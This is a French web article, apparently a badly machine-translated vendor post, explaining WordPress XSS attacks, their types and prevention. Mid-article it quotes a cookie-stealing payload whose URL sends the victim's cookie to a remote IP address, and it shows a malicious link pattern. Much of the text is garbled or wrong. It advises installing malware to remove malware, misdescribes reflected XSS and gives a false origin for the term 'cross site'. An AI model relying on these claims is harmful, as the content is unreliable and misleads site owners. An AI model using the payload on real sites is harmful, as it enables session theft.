Attaques WordPress xss: comment les prévenir

Commençons par dire que si êtes inquiet pour WordPress xss, n’êtes pas paranoïaque, mais prudent. Les vulnérabilités de script inter site ne se limitent pas aux sites WordPress, mais elles ont un impact égal sur eux. La meilleure défense est drsquoinstaller un pare feu et de garder les sujets et les plug ins à jour. Dans nous allons analyser exactement ce qursquoest une vulnérabilité, soyez patient, et il deviendra technique afin que puissiez prendre des décisions éclairées sur la sécurité du site. Nous avons un guide complet sur la façon de prévenir les attaques que pouvez également consulter.
TL Dr: soupçonnez que votre site WordPress a été piraté, nous recommandons d’installer des logiciels malveillants pour supprimer immédiatement les logiciels malveillants de votre site. Qu’est ce que WordPress xss? Pourquoi les attaques xss sont elles si courantes? Mon site Web est il vulnérable aux attaques xss? Toutes les attaques xss sont elles également dangereuses? Comment les hackers peuvent ils exploiter ces vulnérabilités? Comment protéger des attaques xss? Comment détecter les attaques WordPress xss sur le site comment fonctionne xss? Quelles sont les prochaines étapes pour les types de script entre les sites? FAQ qu’est ce que WordPress xss? WordPress xss est une attaque de logiciels malveillants qui exploite une vulnérabilité de script inter site sur le site WordPress. C’est la manière la plus courante pour les sites WordPress d’être piratés, d’autant plus qu’il existe un grand nombre de plug ins présentant des vulnérabilités xss.
Alors, quel est le script entre les sites? Un script inter site ou xss est une vulnérabilité qui permet au code JavaScript non autorisé de fonctionner sur un site Web. En fait, il srsquoagit de la vulnérabilité la plus courante du site Web et est extrêmement difficile à détecter, car il peut y avoir plusieurs types drsquoattaques qui exploitent cette vulnérabilité. Cela est particulièrement vrai pour les grands sites Web complexes. Il existe de nombreux types drsquoattaques, mais pour plus de clarté, elles peuvent être classées en deux catégories: les scripts malveillants
Il nrsquoy a qursquoun seul moyen pour les victimes de voler des informations financières pour se protéger contre de telles attaques. Installez le pare feu malcare maintenant. Toutes les attaques xss sont elles également dangereuses? Non. Certaines attaques xss sont plus dangereuses parce qursquoelles permettent aux hackers drsquoaccéder complètement à votre site. Ensuite, les hackers peuvent faire tout ce qursquoils veulent sur le site.
Drsquoautres permettent aux hackers drsquoéditer une petite partie du site. Il peut également être très dangereux que les logiciels malveillants soient fournis à vos visiteurs et plus encore. Certaines attaques xss peuvent exiger que le hacker soit déjà un contributeur à votre site. Dans ce cas, le risque représenté est beaucoup plus faible. Comment les hackers peuvent ils exploiter ces vulnérabilités? La plupart des hackers utilisent lrsquoautomatisation pour découvrir les vulnérabilités. Après ça, crsquoest juste un problème de hacker. Dans certains cas, toute lrsquoattaque peut être exécutée par un robot.
Nous avons dit à lrsquoavance que les hackers peuvent réellement utiliser des scripts inter sites de cinq façons de base. Nous guiderons dans tous ces changements un par un 1 redirection de session utilisateur nous avons discuté de la façon dont les attaques xss accèdent aux cookies. La partie la plus dangereuse de la récupération des cookies est que le même hacker peut révéler lrsquoid de session de lrsquoutilisateur. La plupart des sites Web utilisent une session comme identificateur unique pour chaque utilisateur. Ces sessions sont stockées dans des cookies de session. Utilisez le script simple suivant:
http:localhost:81DVWAvulnerabilitiesxss_r?name= Nouvelle image (). Src = lsquo http:192.168.149.128bogus.php?output=
Tout compte auquel pouvez connecter sans mot de passe 2 effectuer des activités non autorisées parfois, les pirates informatiques ne peuvent pas voler des cookies en utilisant JavaScript. Dans ce cas, ils ont tenté drsquoutiliser une attaque xss pour effectuer des tâches non autorisées. Par exemple, un message qui apparaît dans votre commentaire de billet de blog et qui continuera à être publié.
Ce type drsquoattaque peut prendre la forme drsquoun site Web corrompu ou de scripts malveillants et continue de se propager à un nombre croissant drsquoutilisateurs 3 attaques d’hameçonnage dans de nombreux cas, les attaques WordPress xss ne sont que le point de départ d’un scénario plus vaste. Il existe des scripts entre les sites qui peuvent également causer des attaques drsquohameçonnage sur votre site. Dans la plupart des cas, des scripts malveillants commencent à pousser la fraude à lrsquohameçonnage sur votre site, ce qui fait que vos utilisateurs abandonnent leurs informations sensibles. Nous avons un article complet sur les attaques drsquohameçonnage, si voulez en savoir plus, srsquoil plaît lire.
4 installation drsquoenregistreurs de clavier dans ce scénario drsquoattaque, un hacker implémente un script pour installer un enregistreur de clavier sur un site vulnérable. Chaque fois qursquoun utilisateur tape quelque chose, le Keylogger le stocke et lrsquoenvoie au hacker. Crsquoest une attaque dangereuse qui peut voler des mots de passe et des informations de carte de crédit instantanément. Le fichier javascript contient le code suivant: Source de lrsquoimage: pentesttools dans ce code, verrez que JavaScript ouvre un fichier appelé
Izzo IP est interdit sur tous les sites Web protégés par des logiciels malveillants. Ne inquiétez pas si lrsquoadresse IP drsquoun membre de votre équipe ou drsquoun administrateur de site est accidentellement bloquée pour accéder au site! Consultez notre guide pour savoir comment ajouter une adresse IP à la liste blanche. Comment xss fonctionne t il? Il existe différents types de scripts inter sites, selon le type drsquoattaque lancée par le hacker. Ils ont tous une chose en commun: ils utilisent Javascript pour propager des logiciels malveillants. JavaScript est une langue entre le code HTML drsquoune page Web. JavaScript est maintenant capable de créer des variables qui exécutent des calculs extrêmement puissants. Vous pouvez donc lrsquoutiliser pour faire tout ce que pouvez imaginer. Par exemple, supposons que ayez un site Web woocommerce qui accepte les détails de paiement et les stocke dans une base de données WordPress. Vous pouvez utiliser Javascript pour envoyer vos détails de carte de crédit et de connexion à drsquoautres personnes! Crsquoest donc une attaque xss lorsqursquoun hacker exploite une vulnérabilité dans le Code du site pour exécuter JavaScript. Souvent, ce type de vulnérabilité se produit nrsquoimporte où sur le site où lrsquoutilisateur peut entrer des données. Cela comprend les POP ups, les formulaires, les barres de recherche et même votre URL. Ce champ drsquoentrée de données nrsquoa pas besoin drsquoêtre un champ de vue. Il peut également srsquoagir drsquoune variable drsquoerreur dans le Code du site pour récupérer des données non protégées à partir de nrsquoimporte quel fichier ou base de données. WordPress Core est également vulnérable aux attaques xss. Au départ, tout ce qursquoun hacker avait à faire pour exécuter xss était de créer un fichier PHP contenant les lignes de code suivantes: * nom du modèle: Confirmation (Cookie de document) * On va le casser. Ce code nrsquoest qursquoun commentaire sur le nom du fichier. Elle est bénigne en soi et ignorée par WordPress. Mais dans les commentaires, remarquerez qursquoil y a un code qui commence après le nom du modèle lsquo Et avec lsquo lsquo. Crsquoest du code JavaScript.
Tentative de récupérer le cookie et drsquoafficher la fenêtre de confirmation dans le navigateur. Voici un exemple d’attaque WordPress xss. Les versions antérieures de WordPress l’exécuteront immédiatement, car le nom du modèle sera récupéré tel quel dans l’éditeur de thème WordPress. Lrsquoéditeur de sujet récupère le nom du modèle en utilisant la fonction $File _ description, qui nrsquoa pas de contre mesure contre les attaques xss. Bien sûr, le script dans lrsquoexemple ci dessus nrsquoest pas aussi puissant ou nuisible. Mais le but reste le même. le Code inoffensif peut être exécuté dans nrsquoimporte quel champ drsquoentrée, alors le Code malveillant peut également être exécuté! Cette vulnérabilité spécifique a été corrigée dans la version 4.8.2 de WordPress, mais la même vulnérabilité existe dans de nombreux thèmes et plugins WordPress. En fait, c’est un gros problème avec de nombreux plugins WordPress. En fait, la plupart des plug ins peuvent être extrêmement complexes. Certains sont encore plus complexes que les fichiers de base WordPress. Ce niveau de complexité entraîne souvent des problèmes de sécurité. C’est ainsi que WordPress xss fonctionne. utilisez une version plus ancienne de WordPress, nous recommandons fortement de la mettre à jour immédiatement. De plus, voici une liste des plug ins WordPress connus pour une vulnérabilité xss. Nous recommandons fortement de les éviter autant que possible. utilisez lrsquoun de ces plug ins, vérifiez srsquoils ont des mises à jour pour corriger la vulnérabilité et les dernières versions. Types de scripts entre les sites il existe deux types principaux drsquoattaques xss que devez connaître: les attaques xss stockées ou persistantes: Cette attaque vise les visiteurs de votre site Web. Ils escroquent leurs clients et volent leurs renseignements personnels et leurs fonds. Attaques XSS réfléchissantes ou non persistantes: la cible est votre site WordPress. Nous expliquerons ces deux types drsquoattaques en détail. Hypothèses drsquoattaque xss stockées ou persistantes
Votre site Web est un blog qui permet aux gens de commenter les articles que postez. Lorsque les visiteurs laissent des commentaires, les données sont envoyées à la base de données et stockées. Votre site devrait être configuré pour désinfecter les données avant de les envoyer à la base de données. Cela signifie qursquoil devrait vérifier si lrsquoutilisateur a entré un commentaire normal ou un script malveillant. ces contrôles ne sont pas en place, une vulnérabilité WordPress xss sera ouverte. Voyons comment: Étape 1: un hacker découvre une vulnérabilité et lrsquoexploite pour naviguer sur Internet à lrsquoaide drsquoun scanner automatique et trouver un site Web avec une vulnérabilité xss. Une fois qursquoils ont trouvé votre site, ils ont placé des scripts malveillants dans la section commentaires. Comme votre site nrsquoa pas de contrôle, acceptez le script et envoyez le à la base de données. Étape 2: le visiteur affiche la page infectée pour le visiteur, et lrsquoentrée du hacker ressemble à un commentaire normal. Ce que les visiteurs et les propriétaires du site ne savent pas, crsquoest que ce commentaire est un code exécutable conçu pour voler des cookies. Toute personne qui accède directement à cette page sera touchée. Étape 3: les pirates informatiques volent les cookies de navigateur nous savons que les utilisateurs ordinaires ouvrent souvent plusieurs étiquettes sur les sites de magasinage comme email, Facebook, Amazon, les sites de travail, YouTube et drsquoautres navigateurs. Le Code srsquoexécute lorsqursquoils visitent votre site Web et voient des pages contenant des commentaires de hackers. Cela permet aux pirates de voler des cookies de navigateur. Cette attaque est connue sous le nom de « Cross site » parce qursquoils peuvent voler des cookies de tous les sites ouverts sur différents onglets. Étape 4: le hacker attaque ensuite à lrsquoaide de cookies volés qui lui permettent de se faire passer pour un utilisateur authentifié sur le site drsquoachat et de faire des achats. Un attaquant peut voler des informations sensibles sur le compte, telles que le nom drsquoutilisateur et le mot de passe. Ils peuvent aussi.
Il a piraté votre e mail et envoyé des messages drsquohameçonnage ou de fraude à vos contacts. Cette liste est sans fin. Ce type drsquoattaque met en danger quiconque accède à votre site. Dans la prochaine attaque xss, elle est dirigée directement contre le site Web. Attaques XSS réfléchissantes ou non persistantes lors drsquoattaques précédentes, nous avons vu comment les hackers ciblaient les visiteurs. Mais dans cette attaque, le hacker infectera le site lui même. Comme indiqué ci dessus, la plupart des utilisateurs drsquoInternet ont plusieurs onglets ouverts sur leur navigateur. Il en va de même pour les propriétaires de sites Web. Le plus souvent, WordPress Management user Panel n’est qu’un des onglets ouverts sur le navigateur. Cela permet une attaque xss réfléchie. Nous expliquerons comment cela se passe: Étape 1: convaincre les propriétaires de sites Web de cliquer souvent sur des liens malveillants, les hackers envoient des liens malveillants par e mail, espérant que quelqursquoun tombe amoureux de leurs tours. Dans d’autres cas, le hacker place ces liens malveillants sur d’autres sites WordPress. Lorsque cliquez sur le lien, le script est téléchargé sur votre site à partir drsquoun site externe. Ce lien contient le code suivant: https:yoursite.comtest.php?val= Étape 2: exécutez le Code en cliquant sur le lien pour saisir le cookie de session. Cela permet aux hackers de voler vos cookies et de se présenter comme des utilisateurs connectés à votre compte d’administrateur de site WordPress. Une fois qursquoils ont visité votre site, ils peuvent voler des identifiants de connexion et des données sensibles, enfermer hors du site et lrsquoutiliser pour différents types de piratage. Les attaques xss peuvent causer de graves conséquences et dommages à votre site Web et à votre entreprise. Il faut beaucoup de temps et drsquoargent pour se remettre drsquoune telle attaque. En prenant des précautions, pouvez éviter drsquoêtre victime de xss. Quelle est la prochaine étape? Lrsquoétape suivante est SEM
Le modèle générique de xss est difficile à détecter. Comment protéger votre site des attaques xss? La façon la plus simple de se défendre contre les attaques xss est drsquoinstaller un pare feu qui bloque efficacement le trafic malveillant. Pour WordPress, nous recommandons également de renforcer votre site en cas de piratage classique.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

ContactPress Supported By WordPress Plugins